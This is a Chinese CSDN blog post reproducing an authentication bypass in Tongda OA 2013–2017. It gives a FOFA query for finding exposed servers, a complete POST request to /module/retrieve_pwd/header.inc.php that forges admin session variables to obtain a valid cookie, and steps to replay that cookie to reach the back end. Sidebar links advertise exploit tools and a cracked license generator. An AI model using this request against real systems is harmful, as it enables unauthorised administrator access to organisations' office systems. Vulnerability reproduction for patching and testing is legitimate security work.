通达OA header身份认证绕过漏洞复现

已于 2023-12-25 14:59:48 修改
阅读量694 收藏 9
点赞数 11
分类专栏: 漏洞复现 文章标签: 漏洞复现 web安全 网络安全 通达OA 未授权访问
于 2023-12-25 12:00:00 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/xiayu729100940/article/details/135137972
版权

通达OA是中国通达公司的一套协同办公自动化软件,通达OA2013,通达OA2016,通达OA2017 存在身份认证绕过漏洞,攻击者可以利用漏洞生成cookie,实现未授权访问。

1.漏洞级别

高危

2.漏洞搜索

fofa 
 title="office Anywhere" 
如需指定版本可以搜
  title="office Anywhere 2013"

3.漏洞复现

3.1 获取有效cookie

poc请求:

POST /module/retrieve_pwd/header.inc.php HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:120.0) Gecko/20100101 Firefox/120.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Connection: close
Upgrade-Insecure-Requests: 1
Content-Length: 1024

_SESSION[LOGIN_THEME]=15&_SESSION[LOGIN_USER_ID]=1&_SESSION[LOGIN_UID]=1&_SESSION[LOGIN_FUNC_STR]=1,3,42,643,644,634,4,147,148,7,8,9,10,16,11,130,5,131,132,256,229,182,183,194,637,134,37,135,136,226,253,254,255,536,24,196,105,119,80,96,97,98,114,126,179,607,539,251,127,238,128,85,86,87,88,89,137,138,222,90,91,92,152,93,94,95,118,237,108,109,110,112,51,53,54,153,217,150,239,240,218,219,43,17,18,19,15,36,70,76,77,115,116,185,235,535,59,133,64,257,2,74,12,68,66,67,13,14,40,41,44,75,27,60,61,481,482,483,484,485,486,487,488,489,490,491,492,120,494,495,496,497,498,499,500,501,502,503,505,504,26,506,507,508,515,537,122,123,124,628,125,630,631,632,633,55,514,509,29,28,129,510,511,224,39,512,513,252,230,231,232,629,233,234,461,462,463,464,465,466,467,468,469,470,471,472,473,474,475,200,202,201,203,204,205,206,207,208,209,65,187,186,188,189,190,191,606,192,193,221,550,551,73,62,63,34,532,548,640,641,642,549,601,600,602,603,604,46,21,22,227,56,30,31,33,32,605,57,609,103,146,107,197,228,58,538,151,6,534,69,71,72,223,639,
  • 注:手动测试时,需要注意Content-Type为必须项,否则生成的cookie无效。(我在这里被坑了好久 导致一直没成功复现)

在这里插入图片描述
返回的Set-Cookie即为我们需要的有效cookie。

3.2 实现登录

将上一步获取的cookie设置到header中。

  • 注: 这个参数名需要修改成Cookie 而不是Set-Cookie
    直接请求后台
url/general/

在这里插入图片描述即可复现成功,网页端可以将cookie手动添加进去然后访问

在这里插入图片描述
至此漏洞就复现完成了。

在这里插入图片描述

fly夏天
关注
  • 11
    点赞
  • 9
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
漏洞复现-通达OA通达OA身份认证绕过漏洞
xiaokp7的博客
02-18 293
通达OA(Office Anywhere网络智能办公系统)是中国通达公司的一套协同办公自动化软件。通达OA 2013-通达OA2017存在一个认证绕过漏洞,利用该漏洞可以实现任意用户登录。攻击者可以通过构造恶意攻击代码,成功登录系统管理员账户,继而在系统后台上传恶意文件控制网站服务器。
通达OA注册机破解版
05-05
通达OA注册机破解版.已经破解接触所有功能,为了支持正版没有只有25人授权
通达OA header身份认证绕过漏洞利用工具
12-25
通达OA header身份认证绕过漏洞利用脚本,可以检测漏洞是否存在并生成可用的cookie
通达OA v2017 video_file.php 任意文件下载漏洞.md
09-07
通达OA漏洞合集
通达OA前台伪造管理登陆cookie生成tongda.py
05-07
通达OA 前台伪造管理员登陆漏洞的cookie生成脚本,可以用以生成PHPsessionid,然后替换cookie,从而登陆通达OA后台。
通达OA_header_inc任意用户登录
Bnessy
10-29 167
【代码】通达OA_header_inc任意用户登录。
通达OA2017记住密码与自动登录
09-22 5662
通达OA2017记住密码与自动登录
网络安全漏洞分析小结
kali_Ma的博客
01-23 6102
(一) 前言 这里感谢师傅前面整理的通达OA一些版本的漏洞复现,这里从漏洞点出发,分析漏洞,从中学些一些师傅白盒挖掘漏洞的思路。 ​ 安装包下载地址,可以通过枚举版本号下载对应的安装包: https://cdndown.tongda2000.com/oa/2019/TDOA11.4.exe https://www.tongda2000.com/download/down.php?VERSION=2019&code= 安装教程为傻瓜式一键安装,这里不细说。 默认账号密码admin/(空) 【一&
漏洞复现通达OA share/handle.php身份认证绕过漏洞
晚风不及你
12-08 617
通达OA(Office Anywhere网络智能办公系统)是由通达信科科技自主研发的协同办公自动化软件,是与中国企业管理实践相结合形成的综合管理办公平台。通达OA为各行业不同规模的众多用户提供信息化管理能力,包括流程审批、行政办公、日常事务、数据统计分析、即时通讯、移动办公等,帮助广大用户降低沟通和管理成本,提升生产和决策效率。
通达OA 身份认证绕过漏洞复现
12-12 711
通达OA(Office Anywhere网络智能办公系统)是由北京通达信科科技有限公司自主研发的协同办公自动化软件,是与中国企业管理实践相结合形成的综合管理办公平台。
通达OA综合利用工具通达OA综合利用工具
03-29
# 工具说明 **通达OA综合利用工具_20200224** <br /> ## 集成POC如下 任意用户登录POC: 4个<br /> SQL注入POC: 2个<br /> 后台文件上传POC: 3个<br /> 本地文件包含POC: 2个<br /> 前台文件上传POC(非WEB目录): 1个<br /> 任意文件删除POC: 1个<br /> <br /> <br /> ## 工具面板截图 ![image.png](https://cdn.nlark.com/yuque/0/2021/png/516736/1614132955247-9f1b3b4d-9019-4665-8925-b36d4a6c141b.png) <br /> <br /> ## 工具利用流程 ### 1.优先利用本地文件包含漏洞 原因是本地文件包含漏洞, 配合前台文件上传可以直接getshell, 无需获取有效Cookie<br /><br /> ### 2.若本地文件包含漏洞利用失败, 其次利用任意用户登录漏洞与SQL注入漏洞 这两个漏洞的利用方式集成在了"获取Cookie"按钮上<br /
通达OA v11.6 insert SQL注入漏洞.md
09-07
通达OA漏洞合集
通达OA流程中心接口文档
12-29
北京通达信科科技有限公司是中国兵器工业信息中心的全资子公司,简称通达信科。 是一支以管理软件研发、实施、服务与咨询为主营业务的高科技企业,隶属于世界500强企业中国兵器工业集团公司。 作为国内协同管理软件行业内唯一的央企单位,通达信科将自身定位于中国协同OA软件的领跑者, 中国优秀的云应用方案提供商。通达信科建立了一支以年轻博士、硕士、高级工程师为核心的专业技术团队, 具备雄厚的研发实力和强大的项目实施及售后服务能力,是一支素质卓越、服务热情、勤勉奋进的优秀科研团队。 一直以来,通达信科坚持秉承央企的信誉、外企的管理、民企的效率,通达信科人具备"能打大仗,敢打硬仗"的项目执行力, 是国内协同管理软件领域内鲜有的专家级领军团队。
通达OA前台任意用户登录漏洞.md
09-07
通达OA漏洞合集
通达OA2017;通达OA2017
01-03
通达OA2017;通达OA2017
网络安全与密码学
最新发布
weixin_61074128的博客
04-27 703
一、密码学是一门研究信息安全保密的学科,主要涉及对信息进行加密、解密以及相关的安全技术和理论。它通过使用各种加密算法和技术,将明文信息转换为密文,以确保信息在传输和存储过程中的保密性、完整性和真实性。密码学在通信、电子商务、金融、军事等领域都有着广泛的应用。密码学包括对称加密、非对称加密、哈希函数、数字签名等重要内容。同时,密码学也在不断发展和创新,以应对不断变化的安全挑战。大家要注意的是我们平时用来认证身份的密码(passwd)翻译成口令更准确。
网络安全思考题
weixin_62304542的博客
04-27 590
网络安全渗透思考题
rmallox勒索病毒威胁网络安全:如何避免数据被锁定
wx_shuju315的博客
04-21 664
在面对被勒索病毒攻击导致的数据文件加密问题时,技术支持显得尤为重要,您可添加我们技术服务号(shuju315),我们的专业团队拥有丰富的数据恢复经验和技术知识,能够迅速定位问题并提供最佳解决方案。我们需要认识到勒索病毒的危害,不轻信来历不明的邮件、链接或附件,避免下载和安装非正规渠道的软件和应用程序。另外,定期备份重要数据也是防范勒索病毒的有效手段。为了防止自己的电脑被.rmallox勒索病毒攻击,我们可以采取一系列预防措施,从提高安全意识、加强系统防护到定期备份数据,全方位地保护我们的电脑安全
通达oa网络办公系统漏洞
01-28
通达OA网络办公系统是一种常用的办公自动化系统,它可以帮助企业实现信息化办公,提高工作效率。然而,即使是这样一种成熟的系统,也可能存在一些安全漏洞。 首先,通达OA系统可能存在身份认证漏洞,即黑客可以通过某些手段绕过系统的身份验证机制,获取授权访问权限。这可能会导致敏感信息的泄露或者系统被非法篡改。 其次,通达OA系统的通信安全也可能存在漏洞,例如没有加密传输机制导致数据在传输过程中容易被窃取或篡改。 此外,系统管理漏洞也是通达OA系统的一个潜在风险,不恰当的系统配置或者权限设置可能导致系统的管理者无法对系统进行有效的监控和管理,从而给黑客留下可乘之机。 针对通达OA系统的这些潜在漏洞,企业可以通过加强系统的安全设置和权限管理来降低风险。同时,定期对系统进行漏洞扫描和安全审计,及时修补系统漏洞,也是确保系统安全的重要手段。另外,公司员工也需要接受专业的安全培训,增强安全意识,避免因为人为操作而导致系统漏洞。综合来看,只有全方位的安全防护措施才能有效地保障通达OA系统的安全

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值